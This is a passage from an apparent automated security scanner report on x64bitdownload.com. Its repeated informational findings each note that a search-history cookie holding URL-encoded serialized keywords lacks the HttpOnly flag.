last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.865. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.866. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.867. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.868. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.869. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.870. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.871. http://www.x64bitdownload.com/64-bit-nntp-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.872. http://www.x64bitdownload.com/64-bit-nzb-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nzb-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.873. http://www.x64bitdownload.com/64-bit-ozum-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ozum-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.874. http://www.x64bitdownload.com/64-bit-par-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-par-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.875. http://www.x64bitdownload.com/64-bit-podcast-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-podcast-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.876. http://www.x64bitdownload.com/64-bit-posts-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-posts-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.877. http://www.x64bitdownload.com/64-bit-rar-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rar-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.878. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.879. http://www.x64bitdownload.com/64-bit-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.880. http://www.x64bitdownload.com/64-bit-reading-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reading-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.881. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.882. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-client-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.883. http://www.x64bitdownload.com/64-bit-rss-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.884. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-feed-reader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.885. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-reader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.886. http://www.x64bitdownload.com/64-bit-search-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-search-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.887. http://www.x64bitdownload.com/64-bit-ssl-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ssl-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.888. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronization-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.889. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronize-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.890. http://www.x64bitdownload.com/64-bit-topic-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-topic-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.891. http://www.x64bitdownload.com/64-bit-troll-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.892. http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-killer-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22troll-killer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22troll+killer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.893. http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-trollkiller-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.894. http://www.x64bitdownload.com/64-bit-use-next-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-use-next-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.895. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.896. http://www.x64bitdownload.com/64-bit-usenet-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.897. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-search-engine-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.898. http://www.x64bitdownload.com/64-bit-usenext-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenext-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.899. http://www.x64bitdownload.com/64-bit-video-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-video-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.900. http://www.x64bitdownload.com/64-bit-xpat-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-xpat-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.901. http://www.x64bitdownload.com/64-bit-yenc-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-yenc-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.902. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.903. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

